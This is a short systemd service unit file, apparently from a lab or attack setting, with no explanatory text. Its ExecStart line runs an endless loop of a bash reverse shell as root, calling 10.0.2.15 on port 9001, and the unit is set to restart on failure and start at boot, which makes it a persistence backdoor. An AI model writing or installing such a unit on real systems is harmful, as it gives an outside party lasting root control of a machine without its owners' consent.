[Service]
Type=simple
User=root
Restart=on-failure
RestartSec=5s
ExecStart=/bin/bash -c "while [ 1 ]; do bash -i >& /dev/tcp/10.0.2.15/9001 0>&1; done"
[Install]
WantedBy=multi-user.target
